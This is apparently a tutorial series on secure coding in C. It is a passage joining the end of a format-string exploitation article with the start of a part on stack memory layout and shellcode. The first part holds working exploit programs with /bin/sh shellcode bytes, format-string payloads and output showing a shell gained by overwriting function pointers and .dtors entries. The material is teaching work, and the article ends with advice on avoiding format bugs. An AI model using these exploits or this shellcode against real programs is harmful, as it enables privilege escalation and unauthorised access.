  printf("argv = %p\n", argv);
  printf("arg = %p\n", arg);
  for (i = 0; i<argc; i++) {
    printf("argv[%d] = %p (%p)\n", i, argv[i], &argv[i]);
    printf("arg[%d] = %p (%p)\n", i, arg[i], &arg[i]);
  }
  printf("\n");

  /* recall */
  if (nb == 0)
    exit(0);
  execve(argv[0], arg, env);
}

The input is an integer nb; the program re-executes itself until nb reaches 0, so it runs nb+1 times in total:

>>./argv 2
*** argv 2 ***
argv = 0xbffff6b4
arg = 0x8049828
argv[0] = 0xbffff80b (0xbffff6b4)
arg[0] = 0xbffff80b (0x8049828)
argv[1] = 0xbffff812 (0xbffff6b8)
arg[1] = 0x8049838 (0x804982c)

*** argv 1 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

*** argv 0 ***
argv = 0xbfffff44
arg = 0x8049828
argv[0] = 0xbfffffec (0xbfffff44)
arg[0] = 0xbfffffec (0x8049828)
argv[1] = 0xbffffff3 (0xbfffff48)
arg[1] = 0x8049838 (0x804982c)

We immediately notice that the addresses allocated for arg and argv no longer move after the second call. We are going to use this property in our exploit. We just have to change our build program slightly to make it call itself before calling vuln. That way, we get the exact address of argv, and that of our shellcode:

/* build2.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Same function as in build.c
}

int
main(int argc, char **argv) {

  char *buf;
  char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
     "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  if(argc < 3)
    return EXIT_FAILURE;

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* address */
        (unsigned int) shellcode,        /* value: address of the shellcode (32bit) */
        atoi(argv[2]));              /* offset */

    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));
    execlp(argv[0], argv[0], buf, shellcode, argv[1], argv[2], NULL);

  } else {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", argv[2]);
    buf = build(strtoul(argv[3], NULL, 16),  /* address */
        (unsigned int) argv[2],          /* value: address of the shellcode (32bit) */
        atoi(argv[4]));              /* offset */

    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));

    execlp("./vuln","./vuln", buf, argv[2], argv[3], argv[4], NULL);
  }

  return EXIT_SUCCESS;
}

The trick is that we know what to call according to the number of arguments the program received. To start our exploit, we just give build2 the address we want to write to and the offset. We no longer have to give the value, since it is worked out by our successive calls.

To succeed, we need to keep the same memory layout between the different calls of build2 and then vuln (that is why we call the build() function, in order to use the same memory footprint):

>>./build2 0xbffff634 3
Calling ./build2 ...
adr : -1073744332 (bffff634)
val : -1073744172 (bffff6d4)
valh: 49151 (bfff)
vall: 63188 (f6d4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14037x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff88f
adr : -1073744332 (bffff634)
val : -1073743729 (bffff88f)
valh: 49151 (bfff)
vall: 63631 (f88f)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14480x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000
00000000000] (127)
after : ptrf() = 0xbffff88f (0xbffff634)
Segmentation fault (core dumped)

Why didn’t this work? We said we had to build an exact copy of the memory between the 2 calls … and we didn’t do it! argv[0] (the name of the program) changed. Our program is first named build2 (6 bytes) and then vuln (4 bytes). There is a difference of 2 bytes, which is exactly the value you can see in the example above. The address of the shellcode during the second call of build2 is given by sc=0xbffff88f, but argv[2] in vuln is at 0xbffff891 (the line "2 0xbffff891"): our 2 bytes. To solve this, it is enough to rename build2 to a 4-letter name, e.g. bui2:

>>cp build2 bui2
>>./bui2 0xbffff634 3
Calling ./bui2 ...
adr : -1073744332 (bffff634)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff891
adr : -1073744332 (bffff634)
val : -1073743727 (bffff891)
valh: 49151 (bfff)
vall: 63633 (f891)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14482x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
000000000000000] (127)
after : ptrf() = 0xbffff891 (0xbffff634)
bash$

Won again: that works much better that way ;-) The eggshell is in the stack and we changed the address pointed to by ptrf to have it point to our shellcode. Of course, this only works if the stack is executable.

But we have seen that format strings allow us to write anywhere : let’s add a destructor to our program in the section .dtors:

>>objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
80498c0 ffffffff 00000000                    ........
>>./bui2 80498c4 3
Calling ./bui2 ...
adr : 134518980 (80498c4)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[ÆÄ%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff894
adr : 134518980 (80498c4)
val : -1073743724 (bffff894)
valh: 49151 (bfff)
vall: 63636 (f894)
[ÆÄ%.49143x%3$hn%.14485x%4$hn] (34)
0 0xbffff86a
1 0xbffff871
2 0xbffff894
3 0xbffff8c2
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [ÆÄ000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x80486c4 (0xbffff634)
Welcome in "helloWorld"
bash$ exit
exit
>>

Here, no coredump is created while quitting our destructor. This is because our shellcode contains an exit(0) call.

To conclude, as a last gift, here is build3.c, which also gives a shell, but with the shellcode passed through an environment variable:

/* build3.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

extern char **environ;

char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Same function as in build.c
}

int main(int argc, char **argv) {
  char **env;
  char **arg;
  char *buf;
  unsigned char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* address */
        (unsigned int) shellcode,        /* value: address of the shellcode (32bit) */
        atoi(argv[2]));              /* offset */

    fprintf(stderr, "%d\n", (int) strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    env = (char **) malloc(sizeof(char *) * 4);
    env[0]=(char *) shellcode;
    env[1]=argv[1];
    env[2]=argv[2];
    env[3]=NULL;
    execve(argv[0],arg,env);
  } else
  if(argc==2) {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", environ[0]);
    buf = build(strtoul(environ[1], NULL, 16),  /* address */
        (unsigned int) environ[0],          /* value: address of the shellcode (32bit) */
        atoi(environ[2]));              /* offset */

    fprintf(stderr, "%d\n", (int) strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, (int) strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    execve("./vuln",arg,environ);
  }

  return 0;
}

Once again, since this environment is in the stack, we need to take care not to modify the memory layout (i.e. not to change the position of the variables and arguments). The binary’s name must contain the same number of characters as the name of the vulnerable program, vuln.

Here, we choose to use the global variable extern char **environ to set the values we need:

  1. environ[0]: contains shellcode;
  2. environ[1]: contains the address where we expect to write;
  3. environ[2]: contains the offset.

We leave you to play with it … this (too) long article is already filled with too much source code and too many test programs.

Conclusion : how to avoid format bugs ?

As shown in this article, the main trouble with this bug comes from the freedom left to users to build their own format string. The solution to avoid such a flaw is very simple: never let a user provide the format string! Most of the time, this simply means inserting a "%s" format when functions such as printf(), syslog(), …, are called. If you really can’t avoid it, then you have to check the input given by the user very carefully.


Acknowledgments

The authors thank Pascal Kalou Bouchareine for his patience (he had to find why our exploit with the shellcode in the stack did not work … whereas this same stack was not executable), his ideas (and more particularly the exec*() trick), his encouragement … but also for his article on format bugs which caused, in addition to our interest in the question, intense cerebral agitation ;-)


Footnotes

… commands1
the word command here means everything that affects the format of the string: the width, the precision, …
… bytes2
the -1 comes from the last character reserved for the '\0'.

Avoiding security holes when developing an application – Part 2: memory, stack and functions, shellcode


Abstract:

This series of articles tries to put the emphasis on the main security holes that can appear within applications. It shows ways to avoid those holes by changing development habits a little.

This article focuses on memory organization and layout and explains the relationship between a function and memory. The last section shows how to build shellcode.


Introduction

In our previous article we analyzed the simplest security holes, the ones based on external command execution. This article and the next one show a widespread type of attack, the buffer overflow. First we will study the memory structure of a running application, and then we’ll write a minimal piece of code that starts a shell (shellcode).

Memory layout

What is a program?

Let’s assume a program is an instruction set, expressed in machine code (regardless of the language used to write it) that we commonly call a binary. When first compiled to get the binary file, the program source held variables, constants and instructions. This section presents the memory layout of the different parts of the binary.

The different areas

To understand what goes on while executing a binary, let’s have a look at the memory organization. It relies on different areas :

[Figure: memory layout]

This is generally not all, but we just focus on the parts that are most important for this article.

The command size -A file --radix 16 gives the size of each area reserved when compiling. From that you get their memory addresses (you can also use the command objdump to get this information). Here is the output of size for a binary called “fct”:

>>size -A fct --radix 16
fct  :
section            size        addr
.interp            0x13   0x80480f4
.note.ABI-tag      0x20   0x8048108
.hash              0x30   0x8048128
.dynsym            0x70   0x8048158
.dynstr            0x7a   0x80481c8
.gnu.version        0xe   0x8048242
.gnu.version_r     0x20   0x8048250
.rel.got            0x8   0x8048270
.rel.plt           0x20   0x8048278
.init              0x2f   0x8048298
.plt               0x50   0x80482c8
.text             0x12c   0x8048320
.fini              0x1a   0x804844c
.rodata            0x14   0x8048468
.data               0xc   0x804947c
.eh_frame           0x4   0x8049488
.ctors              0x8   0x804948c
.dtors              0x8   0x8049494
.got               0x20   0x804949c
.dynamic           0xa0   0x80494bc
.bss               0x18   0x804955c
.stab             0x978         0x0
.stabstr         0x13f6         0x0
.comment          0x16e         0x0
.note              0x78   0x8049574
Total            0x23c8

The text area holds the program instructions. This area is read-only. It’s shared between every process running the same binary. Attempting to write into this area causes a segmentation violation error.

Before explaining the other areas, let’s recall a few things about variables in C. The global variables are used in the whole program while the local variables are only used within the function where they are declared. The static variables have a known size depending on their type when they are declared. Types can be char, int, double, pointers, etc. On a PC type machine, a pointer represents a 32bit integer address within memory. The size of the area pointed to is obviously unknown during compilation. A dynamic variable represents an explicitly allocated memory area – it is really a pointer pointing to that allocated address. Global/local and static/dynamic variables can be combined without problems.

Let’s go back to the memory organization for a given process. The data area stores the initialized global static data (the value is provided at compile time), while the bss segment holds the uninitialized global data. These areas are reserved at compile time since their size is defined according to the objects they hold.

What about local and dynamic variables? They are grouped in a memory area reserved for program execution (user stack frame). Since functions can be invoked recursively, the number of instances of a local variable is not known in advance. When created, they are put in the stack. This stack sits at the highest addresses of the user address space, and works according to a LIFO model (Last In, First Out). The bottom of the user frame area is used for dynamic variable allocation. This area is called the heap: it contains the memory areas addressed by pointers and the dynamic variables. When declared, a pointer is a 32bit variable either in BSS or in the stack and does not point to any valid address. When a process allocates memory (e.g. using malloc) the address of the first byte of that memory (also a 32bit number) is put into the pointer.

Detailed example

The following example illustrates the variable layout in memory :

/* mem.c */

  int    index = 1;   //in data
  char * str;         //in bss
  int    nothing;     //in bss

void f(char c)
{
  int i;              //in the stack
  /* Reserves 5 characters in the heap */
  str = (char*) malloc (5 * sizeof (char));
  strncpy(str, "abcde", 5);
}

int main (void)
{
  f(0);
}

The gdb debugger confirms all this.

>>gdb mem
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions.  Type "show copying"
to see the conditions.  There is absolutely no warranty
for GDB.  Type "show warranty" for details.  This GDB was
configured as "i386-redhat-linux"...
(gdb)

Let’s put a breakpoint in the f() function and run the program until this point:

(gdb) list
7      void f(char c)
8      {
9         int i;
10        str = (char*) malloc (5 * sizeof (char));
11        strncpy (str, "abcde", 5);
12     }
13
14     int main (void)
(gdb) break 12
Breakpoint 1 at 0x804842a: file mem.c, line 12.
(gdb) run
Starting program: mem

Breakpoint 1, f (c=0 '\000') at mem.c:12
12      }

We now can see the place of the different variables.

1. (gdb) print &index
$1 = (int *) 0x80494a4
2. (gdb) info symbol 0x80494a4
index in section .data
3. (gdb)  print &nothing
$2 = (int *) 0x8049598
4. (gdb) info symbol 0x8049598
nothing in section .bss
5. (gdb) print str
$3 = 0x80495a8 "abcde"
6. (gdb) info symbol 0x80495a8
No symbol matches 0x80495a8.
7. (gdb) print &str
$4 = (char **) 0x804959c
8. (gdb) info symbol 0x804959c
str in section .bss
9. (gdb) x 0x804959c
0x804959c <str>:     0x080495a8
10. (gdb) x/2x 0x080495a8
0x80495a8: 0x64636261      0x00000065

The command in 1 (print &index) shows the memory address of the index global variable. The second instruction (info) gives the symbol associated with this address and the place in memory where it can be found: index, an initialized global static variable, is stored in the data area.

Instructions 3 and 4 confirm that the uninitialized static variable nothing can be found in the BSS segment.

Line 5 displays str … in fact the str variable content, that is the address 0x80495a8. The instruction 6 shows that no variable has been defined at this address. Command 7 allows you to get the str variable address and command 8 indicates it can be found in the BSS segment.

At 9, the 4 bytes displayed correspond to the memory content at address 0x804959c : it’s a reserved address within the heap. The content at 10 shows our string “abcde” :

hexadecimal value : 0x64 63 62 61      0x00000065
character         :    d  c  b  a               e

The local variables c and i are put in the stack.

We notice that the size returned by the size command for the different areas does not match what we expected when looking at our program. The reason is that various other variables declared in libraries appear when running the program (type info variables under gdb to get them all).

The stack and the heap

Each time a function is called, a new environment must be created within memory for local variables and the function’s parameters (here environment means all elements appearing while executing a function: its arguments, its local variables, its return address in the execution stack… this is not the environment for shell variables we mentioned in the previous article). The %esp (extended stack pointer) register holds the address of the top of the stack, which is at the bottom in our representation (we keep calling it the top, by analogy with a stack of real objects); it points to the last element added to the stack. Depending on the architecture, this register may instead point to the first free space in the stack.

The address of a local variable within the stack could be expressed as an offset relative to %esp. However, since items are constantly added to and removed from the stack, the offset of each variable would then need constant readjustment, which is very inefficient. A second register improves on this: %ebp (extended base pointer) holds the start address of the environment of the current function. Thus, it’s enough to express the offset relative to this register, which stays constant while the function is executed. Now it is easy to find the parameters or the local variables within a function.

The stack’s basic unit is the word: on i386 CPUs it’s 32bit, that is 4 bytes. This is different for other architectures. On Alpha CPUs a word is 64 bits. The stack only manages words, which means every allocated variable occupies a whole number of words. We’ll see that in more detail in the description of a function prolog. The display of the str variable content using gdb in the previous example illustrates it. The gdb x command displays a whole 32bit word (read its bytes from right to left since it’s a little endian representation).

The stack is usually manipulated with just 2 cpu instructions :

  • push value : this instruction puts the value at the top of the stack. It reduces %esp by a word to get the address of the next word available in the stack, and stores the value given as an argument in that word;
  • pop dest : puts the item from the top of the stack into the ‘dest’. It puts the value held at the address pointed to by %esp in dest and increases the %esp register. To be precise nothing is removed from the stack. Just the pointer to the top of the stack changes.

The registers

What exactly are the registers? You can see them as drawers holding only one word, while memory is made of a series of words. Each time a new value is put in a register, the old value is lost. Registers allow direct communication between memory and CPU.

The first ‘e‘ appearing in the registers name means “extended” and indicates the evolution between old 16bit and present 32bit architectures.

The registers can be divided into 4 categories :

  1. general registers : %eax, %ebx, %ecx and %edx are used to manipulate data;
  2. segment registers : 16bit %cs, %ds, %es and %ss, hold the first part of a memory address;
  3. offset registers : they indicate an offset related to segment registers :
    • %eip (Extended Instruction Pointer) : indicates the address of the next instruction to be executed;
    • %ebp (Extended Base Pointer) : indicates the beginning of the local environment for a function;
    • %esi (Extended Source Index) : holds the data source offset in an operation using a memory block;
    • %edi (Extended Destination Index) : holds the destination data offset in an operation using a memory block;
    • %esp (Extended Stack Pointer) : the top of the stack;
  4. special registers : they are only used by the CPU.

Note: everything said here about registers is very x86 oriented; Alpha, SPARC, etc. have registers with different names but similar functionality.

The functions

Introduction

This section presents the behavior of a program from call to finish. Along this section we’ll use the following example :

/* fct.c */

#include <stdio.h>

void toto(int i, int j)
{
  char str[5] = "abcde";
  int k = 3;
  j = 0;
  return;
}

int main(int argc, char **argv)
{
  int i = 1;
  toto(1, 2);
  i = 0;
  printf("i=%d\n",i);
}

The purpose of this section is to explain the behavior of the above functions regarding the stack and the registers. Some attacks try to change the way a program runs. To understand them, it’s useful to know what normally happens.

Running a function is divided into three steps :

  1. the prolog : when entering a function, you already prepare the way out of it, saving the stack’s state before entering the function and reserving the needed memory to run it;
  2. the function call : when a function is called, its parameters are put into the stack and the instruction pointer (IP) is saved to allow the instruction execution to continue from the right place after the function;
  3. the function return : to put things back as they were before calling the function.

The prolog

A function always starts with the instructions :

push   %ebp
mov    %esp,%ebp
sub    $0xc,%esp       //$0xc depends on each program

These three instructions make up what is called the prolog. Diagram 1 details how the prolog of the toto() function works and explains the roles of the %ebp and %esp registers:

Diag. 1 : prolog of a function
Initially, %ebp points to some address X in memory. %esp is lower in the stack, at address Y, and points to the last stack entry. When entering a function, you must save the beginning of the “current environment”, that is %ebp. Since %ebp is pushed onto the stack, %esp decreases by one memory word.
The second instruction builds a new “environment” for the function by making %ebp point to the top of the stack. %ebp and %esp then point to the same memory word, which holds the address of the previous environment.
Now the stack space for local variables has to be reserved. The character array is defined with 5 items and needs 5 bytes (a char is one byte). However, the stack only manages words and can only reserve multiples of a word (1 word, 2 words, 3 words, …). To store 5 bytes with 4-byte words, you must use 8 bytes (that is, 2 words). The grayed part could be used, even though it is not really part of the string. The k integer uses 4 bytes. This space is reserved by decreasing the value of %esp by 0xc (12 in decimal). The local variables use 8+4=12 bytes (i.e. 3 words).
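The size computation above can be checked with a few lines of C. This is only a sketch: round_up_to_word() and toto_locals_size() are names made up for this illustration, and the 4-byte word is the one assumed throughout this article. A modern compiler is free to pad or order a frame differently.

```c
#include <stddef.h>

/* Hypothetical helper: round nbytes up to the next multiple of word. */
size_t round_up_to_word(size_t nbytes, size_t word)
{
    return (nbytes + word - 1) / word * word;
}

/* Space for the locals of toto() as described in the text:
   char str[5] padded to whole words, plus the int k (4 bytes here). */
size_t toto_locals_size(void)
{
    const size_t word = 4;   /* assumed 32-bit word */
    return round_up_to_word(5, word) + round_up_to_word(4, word);
}
```

Under these assumptions round_up_to_word(5, 4) gives 8 and toto_locals_size() gives 12, which is the 0xc subtracted from %esp.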

Apart from the mechanism itself, the important thing to remember here is the position of the local variables : they have a negative offset relative to %ebp. The i=0 instruction in the main() function illustrates this. The assembly code (cf. below) uses indirect addressing to access the i variable :

0x8048411 <main+25>:    movl   $0x0,0xfffffffc(%ebp)

The hexadecimal value 0xfffffffc represents the integer -4. The notation means : put the value 0 into the variable found at “-4 bytes” relative to the %ebp register. i is the first and only local variable in the main() function, therefore its address is 4 bytes (i.e. the size of an integer) “below” the %ebp register.
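To see why gdb prints a negative offset as a large hexadecimal number, the 32-bit two's complement value can be decoded by hand. The function name disp_as_signed() is an assumption made for this sketch.

```c
#include <stdint.h>

/* Interpret a raw 32-bit displacement, as printed by gdb,
   as a signed two's complement offset. */
int32_t disp_as_signed(uint32_t raw)
{
    if (raw & 0x80000000u)   /* top bit set: the value is negative */
        return (int32_t)((int64_t)raw - 4294967296LL);   /* raw - 2^32 */
    return (int32_t)raw;
}
```

With this helper, 0xfffffffc decodes to -4 (the i variable of main()), while a small value such as 0xc stays +12.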

The call

Just like the prolog of a function prepares its environment, the function call allows this function to receive its arguments, and once terminated, to return to the calling function.

As an example, let’s take the toto(1, 2); call.

Diag. 2 : Function call
Before calling a function, the arguments it needs are stored on the stack. In our example, the two constant integers 1 and 2 are pushed, beginning with the last one. The %eip register holds the address of the next instruction to execute, in this case the function call.
When the call instruction executes, %eip takes the address of the following instruction, found 5 bytes further on (call is a 5-byte instruction here; not all instructions have the same size, and sizes depend on the CPU). The call then saves the address contained in %eip so that execution can resume there after the function has run. This “backup” is done by an implicit instruction that pushes the register onto the stack :

    push %eip

The value given as an argument to call corresponds to the address of the first prolog instruction from the toto() function. This address is then copied to %eip, thus it becomes the next instruction to execute.
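The address saved by call can be worked out from the disassembly of main() shown later in this section. The sketch below assumes the 5-byte call form used in this article; return_address_for_call() and CALL_REL32_SIZE are names invented for the illustration.

```c
#include <stdint.h>

/* Size of the call instruction used in this article:
   1 opcode byte followed by a 4-byte displacement. */
enum { CALL_REL32_SIZE = 5 };

/* Address pushed on the stack by a call located at call_addr. */
uint32_t return_address_for_call(uint32_t call_addr)
{
    return call_addr + CALL_REL32_SIZE;
}
```

For the call at 0x8048409 (main+17) this gives 0x804840e (main+22), the add $0x8,%esp that follows the call in the listing.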

Once we are in the function body, its arguments and the return address have a positive offset relative to %ebp, since the prolog makes this register point to the top of the stack. The j=0 instruction in the toto() function illustrates this. The assembly code again uses indirect addressing to access j :

0x80483ed <toto+29>:    movl   $0x0,0xc(%ebp)

The hexadecimal value 0xc represents the integer +12. The notation means : put the value 0 into the variable found at “+12 bytes” relative to the %ebp register. j is the function’s second argument and it’s found 12 bytes “above” the %ebp register (4 for the saved %ebp, 4 for the instruction pointer backup and 4 for the first argument, cf. the first diagram in the return section).
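The offset of any argument follows the same arithmetic. This is a sketch for the frame layout described in this section (saved %ebp at offset 0, return address at offset 4, arguments above, all 4 bytes wide); arg_offset_from_ebp() is a hypothetical name.

```c
#include <stddef.h>

/* Offset, relative to %ebp, of the argument number `index`
   (0 for the first argument) in the frame described above. */
size_t arg_offset_from_ebp(size_t index)
{
    const size_t word = 4;             /* assumed 32-bit word        */
    return 2 * word + index * word;    /* skip saved %ebp and return */
}
```

The first argument i of toto() lands at 0x8(%ebp) and the second argument j at 0xc(%ebp), which matches the movl $0x0,0xc(%ebp) instruction.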

The return

Leaving a function is done in two steps. First, the environment created for the function must be cleaned up (i.e. putting %ebp and %eip back as they were before the call). Once this is done, we must remove from the stack the information related to the function we have just left.

The first step is done within the function with the instructions :

leave
ret

The next one is done within the function where the call took place and consists of cleaning up the stack from the arguments of the called function.

We carry on with the previous example of the toto() function.

Diag. 3 : Function return
Here we recall the initial situation, before the call and the prolog : %ebp was at address X and %esp at address Y. From there we stacked the function arguments, saved %eip and %ebp, and reserved some space for our local variables. The next executed instruction will be leave.
The leave instruction is equivalent to the sequence :

    mov %ebp,%esp
    pop %ebp

The first one takes %esp and %ebp back to the same place in the stack. The second one pops the top of the stack into the %ebp register. With a single instruction (leave), the stack is as it would have been without the prolog.

The ret instruction restores %eip so that execution of the calling function resumes where it should, that is after the function we are leaving. For this, it’s enough to pop the top of the stack into %eip. We are not yet back to the initial situation since the function arguments are still stacked. Removing them is the job of the next instruction, represented by its address Z+5 in %eip (notice that instruction addresses increase, as opposed to what happens on the stack).
The stacking of parameters is done in the calling function, and so is the unstacking. This is illustrated in the diagram by the separator between the instructions of the called function and the add $0x8,%esp in the calling function. This instruction moves %esp back up by as many bytes as the toto() function parameters used. The %ebp and %esp registers are now in the situation they were in before the call. On the other hand, the %eip instruction register has moved up.

Disassembling

gdb lets us obtain the assembly code corresponding to the main() and toto() functions :

>>gcc -g -o fct fct.c
>>gdb fct
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.  GDB is free
software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of
it under certain conditions.  Type "show copying" to see
the conditions.  There is absolutely no warranty for GDB.
Type "show warranty" for details.  This GDB was configured
as "i386-redhat-linux"...
(gdb) disassemble main                    //main
Dump of assembler code for function main:

0x80483f8 <main>:    push   %ebp //prolog
0x80483f9 <main+1>:  mov    %esp,%ebp
0x80483fb <main+3>:  sub    $0x4,%esp

0x80483fe <main+6>:  movl   $0x1,0xfffffffc(%ebp)

0x8048405 <main+13>: push   $0x2 //call
0x8048407 <main+15>: push   $0x1
0x8048409 <main+17>: call   0x80483d0 <toto>


0x804840e <main+22>: add    $0x8,%esp //return from toto()

0x8048411 <main+25>: movl   $0x0,0xfffffffc(%ebp)
0x8048418 <main+32>: mov    0xfffffffc(%ebp),%eax

0x804841b <main+35>: push   %eax     //call
0x804841c <main+36>: push   $0x8048486
0x8048421 <main+41>: call   0x8048308 <printf>


0x8048426 <main+46>: add    $0x8,%esp //return from printf()
0x8048429 <main+49>: leave            //return from main()
0x804842a <main+50>: ret

End of assembler dump.
(gdb) disassemble toto                    //toto
Dump of assembler code for function toto:

0x80483d0 <toto>:     push   %ebp   //prolog
0x80483d1 <toto+1>:   mov    %esp,%ebp
0x80483d3 <toto+3>:   sub    $0xc,%esp

0x80483d6 <toto+6>:   mov    0x8048480,%eax
0x80483db <toto+11>:  mov    %eax,0xfffffff8(%ebp)
0x80483de <toto+14>:  mov    0x8048484,%al
0x80483e3 <toto+19>:  mov    %al,0xfffffffc(%ebp)
0x80483e6 <toto+22>:  movl   $0x3,0xfffffff4(%ebp)
0x80483ed <toto+29>:  movl   $0x0,0xc(%ebp)
0x80483f4 <toto+36>:  jmp    0x80483f6 <toto+38>

0x80483f6 <toto+38>:  leave         //return from toto()
0x80483f7 <toto+39>:  ret

End of assembler dump.

The instructions that are not part of a prolog, call or return group correspond to our program instructions, such as assignments.

Creating a shellcode

In some cases, it’s possible to act on the process stack content by overwriting the return address of a function, making the application execute arbitrary code. This is especially interesting for a cracker if the application runs under an ID different from the user’s one (Set-UID program or daemon). This type of mistake is particularly dangerous if an application like a document reader is started by another user : the famous Acrobat Reader bug, where a modified document was able to trigger a buffer overflow, is one example. It also applies to network services (e.g. imap).

In future articles, we’ll talk about mechanisms used to execute instructions. Here we start studying the code itself, the one we want to be executed from the main application. The simplest solution is to have a piece of code to run a shell. The reader can then perform other actions such as changing the /etc/passwd file permission. For reasons which will be obvious later, this program must be done in Assembly language. This type of small program which is used to run a shell is usually called shellcode.

The examples mentioned are inspired from Aleph One’s article “Smashing the Stack for Fun and Profit” from the Phrack magazine number 49.

With C language

The goal of a shellcode is to run a shell. The following C program does this :

/* shellcode1.c */

    #include <stdio.h>
    #include <unistd.h>

int main()
{
  char * name[] = {"/bin/sh", NULL};
  execve(name[0], name, NULL);
  return (0);
}

Among the set of functions able to call a shell, many reasons recommend the use of execve(). First, it’s a true system-call, unlike the other functions from the exec() family, which are in fact GlibC library functions built from execve(). A system-call is done from an interrupt. It suffices to define the registers and their content to get an effective and short Assembly code.

Moreover, if execve() succeeds, the calling program (here the main application) is replaced with the executable code of the new program, which then starts. When the execve() call fails, the program execution goes on. In our example, the code is inserted in the middle of the attacked application. Going on with execution would be meaningless and could even be disastrous. The execution must then end as quickly as possible. A return (0) exits a program only when it is executed from the main() function, which is unlikely here. We must then force termination through the exit() function.

/* shellcode2.c */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

int main()
{
  char * name [] = {"/bin/sh", NULL};
  execve (name [0], name, NULL);
  exit (0);
}

In fact, exit() is another library function that wraps the real system-call _exit(). A new change brings us closer to the system :

/* shellcode3.c */
    #include <unistd.h>
    #include <stdio.h>

int main()
{
  char * name [] = {"/bin/sh", NULL};
  execve (name [0], name, NULL);
  _exit(0);
}
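The fact that execve() only returns when it fails can be observed safely with a path that does not exist. The sketch below is an illustration only: exec_or_errno() is a made-up name, and it returns errno instead of calling _exit() so that the failure can be inspected.

```c
#include <errno.h>
#include <stddef.h>
#include <unistd.h>

/* Try to replace the current process with `path`.
   On success this function never returns; on failure it
   returns the errno value set by execve(). */
int exec_or_errno(const char *path)
{
    char *const argv[] = { (char *)path, NULL };
    char *const envp[] = { NULL };        /* empty environment */

    execve(path, argv, envp);
    /* Only reached if execve() failed. */
    return errno;
}
```

Called with a path such as "/nonexistent/shell", the function comes back with ENOENT, and execution simply continues in the caller. This is the situation that the _exit(0) in shellcode3.c guards against.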

Now, it’s time to compare our program to its Assembly equivalent.

Assembly calls

We’ll use gcc and gdb to get the assembly instructions corresponding to our small program. Let’s compile shellcode3.c with the debugging option (-g) and integrate the functions normally found in shared libraries into the program itself with the --static option. Now, we have the information needed to understand the way the execve() and _exit() system-calls work.

$ gcc -o shellcode3 shellcode3.c -O2 -g --static

Next, with gdb, we look for our functions Assembly equivalent. This is for Linux on Intel platform (i386 and up).

$ gdb shellcode3
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions.  Type "show copying"
to see the conditions.  There is absolutely no warranty
for GDB.  Type "show warranty" for details.  This GDB was
configured as "i386-redhat-linux"...

We ask gdb to list the Assembly code, more particularly its main() function.

(gdb) disassemble main
Dump of assembler code for function main:
